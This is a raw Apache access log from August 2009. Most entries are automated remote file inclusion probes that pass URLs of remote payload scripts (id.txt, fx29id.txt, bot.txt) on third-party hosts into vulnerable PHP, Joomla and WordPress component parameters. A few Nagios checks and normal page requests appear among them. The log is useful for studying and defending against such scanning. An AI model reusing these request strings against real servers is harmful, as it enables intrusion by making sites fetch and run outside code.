220.231.126.252 - - [03/Aug/2009:00:00:00 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:00:00 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 12079 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:00:59 -0400] "GET /logs/error_log.Q109071900////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:01:25 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:01:25 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:01:25 -0400] "GET /logs/access_log.Q109051200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:01:28 -0400] "GET /logs/access_log.Q109052900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:01:45 -0400] "GET /logs/error_log.Q109071900////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:02:54 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:02:54 -0400] "GET /logs/access_log.Q109071600/////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:02:54 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 200 12146 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:04:01 -0400] "GET /logs/access_log.Q109071700/////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:04:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.197.26 - - [03/Aug/2009:00:04:28 -0400] "GET /i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:29 -0400] "GET /logs/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:29 -0400] "GET /logs/access_log.Q109071000/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:30 -0400] "GET /logs/access_log.Q109071000/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:30 -0400] "GET /i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:30 -0400] "GET /logs/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:32 -0400] "GET /logs/access_log.Q109062300/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:34 -0400] "GET /logs/access_log.Q109062300/i.social.php?Q=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
94.23.197.26 - - [03/Aug/2009:00:04:44 -0400] "GET /i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:00:04:44 -0400] "GET /logs/access_log.Q109071000%20%20/i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:00:04:44 -0400] "GET /logs/i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:00:04:45 -0400] "GET /logs/access_log.Q109062300%20%20/i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:05:01 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:00:05:42 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:05:47 -0400] "GET /logs/access_log.Q109071600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:00:05:58 -0400] "GET /logs/access_log.Q109071000/i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.197.26 - - [03/Aug/2009:00:05:59 -0400] "GET /logs/access_log.Q109062300/i.social.php?Q=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:00:06:07 -0400] "GET /logs/access_log.Q109071700%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.138.139 - - [03/Aug/2009:00:06:41 -0400] "GET /?sourcedir=http://plengeh.wen.ru/id.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
110.45.138.139 - - [03/Aug/2009:00:06:43 -0400] "GET /logs/?sourcedir=http://plengeh.wen.ru/id.txt?%0D?? HTTP/1.1" 200 12138 "-" "libwww-perl/5.79"
110.45.138.139 - - [03/Aug/2009:00:06:46 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://plengeh.wen.ru/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
124.0.237.140 - - [03/Aug/2009:00:06:51 -0400] "GET /?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:06:51 -0400] "GET /logs/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:06:51 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:07:08 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:07:08 -0400] "GET /logs/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:07:09 -0400] "GET /?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.138.139 - - [03/Aug/2009:00:07:17 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://plengeh.wen.ru/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
124.0.237.140 - - [03/Aug/2009:00:07:30 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:07:54 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:07:59 -0400] "GET /logs/access_log.Q109063000%20%20/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.237.140 - - [03/Aug/2009:00:08:18 -0400] "GET /logs/access_log.Q109063000%20%20/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:09:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.10.128.84 - - [03/Aug/2009:00:11:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
190.10.128.84 - - [03/Aug/2009:00:11:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
201.232.54.48 - - [03/Aug/2009:00:11:27 -0400] "GET /logs/access_log.Q109071000//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
190.10.128.84 - - [03/Aug/2009:00:11:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
190.10.128.84 - - [03/Aug/2009:00:11:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
220.231.126.252 - - [03/Aug/2009:00:11:45 -0400] "GET /logs/access_log.Q109063000%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:11:48 -0400] "GET /logs/access_log.Q109071400%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:12:51 -0400] "GET /logs/access_log.Q109063000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:00:12:54 -0400] "GET /logs/access_log.Q109071400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:13:11 -0400] "GET //includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:13:11 -0400] "GET /logs/access_log.Q109061500//includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:13:11 -0400] "GET /logs//includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:13:21 -0400] "GET /logs/access_log.Q109072500//includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:14:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
141.223.5.11 - - [03/Aug/2009:00:15:42 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/aldiid.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
124.0.237.140 - - [03/Aug/2009:00:17:30 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:17:33 -0400] "GET /logs/access_log.Q109061500%20%20//includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:17:53 -0400] "GET /logs/access_log.Q109072500%20%20//includes/kb_constants.php?module_root_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:19:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.80.195.47 - - [03/Aug/2009:00:22:12 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {668D0602-F28B-885E-FE94-F9C6E69580B2}; .NET CLR 1.1.4322)"
209.59.12.99 - - [03/Aug/2009:00:25:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.237.140 - - [03/Aug/2009:00:28:25 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:28:40 -0400] "GET //embed/day.php?path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:28:40 -0400] "GET /logs/error_log.Q109071800%20%20//embed/day.php?path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:28:40 -0400] "GET /logs//embed/day.php?path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:29:47 -0400] "GET /logs/error_log.Q109071800//embed/day.php?path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:30:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.60.36.242 - - [03/Aug/2009:00:30:28 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
65.60.36.242 - - [03/Aug/2009:00:30:29 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.27.92.62 - - [03/Aug/2009:00:31:07 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.27.92.62 - - [03/Aug/2009:00:31:07 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
69.27.92.62 - - [03/Aug/2009:00:31:08 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
69.27.92.62 - - [03/Aug/2009:00:33:20 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:00:33:28 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:33:28 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:33:28 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:00:33:55 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
94.23.205.32 - - [03/Aug/2009:00:35:02 -0400] "GET //?option=com_myblog&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:35:02 -0400] "GET /logs/access_log.Q109051200//?option=com_myblog&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:35:02 -0400] "GET /logs//?option=com_myblog&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:35:03 -0400] "GET /logs/access_log.Q109061200//?option=com_myblog&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
213.149.105.8 - - [03/Aug/2009:00:35:21 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:00:35:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [03/Aug/2009:00:35:33 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
94.23.205.32 - - [03/Aug/2009:00:36:13 -0400] "GET /logs/access_log.Q109051200//?option=com_facileforms&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:36:13 -0400] "GET /logs//?option=com_facileforms&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:36:13 -0400] "GET //?option=com_facileforms&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [03/Aug/2009:00:36:51 -0400] "GET /logs/access_log.Q109061200//?option=com_facileforms&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
72.30.81.182 - - [03/Aug/2009:00:38:04 -0400] "GET /logs/error_log.Q109062300 HTTP/1.0" 200 2793028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.45.45 - - [03/Aug/2009:00:38:38 -0400] "GET /logs/access_log.Q109071400//?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:00:38:38 -0400] "GET //?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:00:38:38 -0400] "GET /logs/access_log.Q109063000//?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:00:38:38 -0400] "GET /logs//?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 200 12143 "-" "libwww-perl/5.805"
72.30.81.182 - - [03/Aug/2009:00:38:04 -0400] "GET /logs/access_log.Q109062500 HTTP/1.0" 200 5016688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [03/Aug/2009:00:40:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [03/Aug/2009:00:42:26 -0400] "GET /logs/access_log.Q109061300%20//?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
202.125.45.45 - - [03/Aug/2009:00:42:26 -0400] "GET /logs/access_log.Q109071300%20//?option=com_extcalendar&task=view&Itemid=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.71.12.133 - - [03/Aug/2009:00:42:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
71.128.200.166 - - [03/Aug/2009:00:43:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [03/Aug/2009:00:43:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [03/Aug/2009:00:43:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.128.200.166 - - [03/Aug/2009:00:43:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [03/Aug/2009:00:45:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.34.176.211 - - [03/Aug/2009:00:48:17 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:00:48:18 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:00:48:18 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
64.34.176.211 - - [03/Aug/2009:00:48:19 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
209.172.33.230 - - [03/Aug/2009:00:48:25 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:00:48:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:00:48:25 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:00:48:25 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.812"
75.125.35.18 - - [03/Aug/2009:00:48:38 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:00:48:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:00:48:43 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.826"
75.125.35.18 - - [03/Aug/2009:00:48:48 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.826"
91.142.209.134 - - [03/Aug/2009:00:48:59 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.milanoinc.com/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
